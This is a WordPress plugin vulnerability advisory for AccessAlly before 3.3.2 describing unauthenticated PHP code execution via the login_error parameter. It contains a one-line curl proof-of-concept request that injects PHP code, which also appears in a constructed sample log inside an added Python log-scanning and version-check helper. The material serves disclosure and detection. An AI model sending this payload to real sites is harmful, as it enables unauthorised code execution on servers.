AccessAlly < 3.3.2 - Unauthenticated Arbitrary PHP Code Execution
Description
Prior to version 3.3.2, the AccessAlly plugin allowed arbitrary PHP code execution through the login_error function.

This exploit is now public and is actively being exploited in the wild.

Proof of Concept
curl -Ls http://www.example.com/login/?login_error=%3C?%20$a%20=%20getcwd();%20echo%20$a;%20?%3E
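
The request above puts a PHP open tag inside the login_error query parameter, so a defender can look for exactly that shape in web-server access logs while the plugin is being updated. The following Python helper is an added example, not part of the WPScan entry or the AccessAlly plugin: it parses combined-format access-log lines, URL-decodes the login_error value and flags any request carrying a PHP tag, and it compares an installed version string against the fixed release 3.3.2. The log lines embedded in it are constructed, not captured traffic; the regular expressions and function names are this example's own.

```python
"""Detection helper for the AccessAlly < 3.3.2 login_error issue (WPVDB 10039).

Added example, not code from the WPScan entry or from the AccessAlly plugin.
Flags access-log requests whose login_error query parameter carries a PHP
open tag (the shape of the published PoC) and checks a plugin version string
against the fixed release 3.3.2. Sample log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, unquote_plus

FIXED_VERSION = (3, 3, 2)

# Request line inside an Apache/nginx "combined" log entry: "GET /path HTTP/1.1"
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# PHP open tags: "<?", "<?php", "<?=" (the PoC sends the short form as %3C?)
_PHP_TAG_RE = re.compile(r'<\?(?:php|=)?', re.IGNORECASE)


def parse_version(version: str) -> tuple:
    """Turn '3.3.1' into (3, 3, 1); non-numeric components count as 0."""
    parts = [int(p) if p.isdigit() else 0 for p in version.strip().split('.')]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable_version(version: str) -> bool:
    """True when the installed AccessAlly version predates the 3.3.2 fix."""
    return parse_version(version) < FIXED_VERSION


def query_params(target: str) -> list:
    """Split a request target's query string into (key, raw_value) pairs.

    Done by hand rather than with parse_qs so that ';' inside a payload
    (e.g. 'getcwd();') is never treated as a parameter separator.
    """
    params = []
    for pair in urlsplit(target).query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params.append((unquote_plus(key), value))
    return params


def login_error_payloads(target: str) -> list:
    """Return decoded login_error values that contain a PHP open tag."""
    hits = []
    for key, raw in query_params(target):
        if key != 'login_error':
            continue
        # Decode twice so a double-encoded tag (%253C?) is caught as well.
        decoded = unquote_plus(unquote_plus(raw))
        if _PHP_TAG_RE.search(decoded):
            hits.append(decoded)
    return hits


def scan_access_log(lines) -> list:
    """Return (line_number, decoded_payload) for every PoC-shaped request."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = _REQUEST_RE.search(line)
        if m:
            for payload in login_error_payloads(m.group('target')):
                findings.append((lineno, payload))
    return findings


# Constructed sample log (not real traffic): a plain login page hit, a benign
# login_error message, and a request shaped like the published PoC.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jan/2020:10:00:01 +0000] "GET /login/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Jan/2020:10:00:07 +0000] "GET /login/?login_error=Invalid%20password HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Jan/2020:10:02:13 +0000] "GET /login/?login_error=%3C?%20$a%20=%20getcwd();%20echo%20$a;%20?%3E HTTP/1.1" 200 700 "-" "curl/7.64.0"',
]

if __name__ == '__main__':
    for lineno, payload in scan_access_log(SAMPLE_LOG):
        print(f'line {lineno}: PHP tag in login_error -> {payload!r}')
    for v in ('3.3.1', '3.3.2'):
        print(f'AccessAlly {v} vulnerable: {is_vulnerable_version(v)}')
```

A hit on a host running a version below 3.3.2 should be treated as a likely compromise rather than a blocked attempt, since the request is served by the plugin itself; the version check tells you which hosts still need the update.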

Affects Plugin

AccessAlly, fixed in version 3.3.2

References

URL https://accessally.com/blog/accessally-release-notes-3-3-2/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Brad Patton
Submitter Brad Patton
Views 3935
Verified No
WPVDB ID 10039

Timeline

Publicly Published 2020-01-21
Added 2020-01-21
Last Updated 2020-02-20
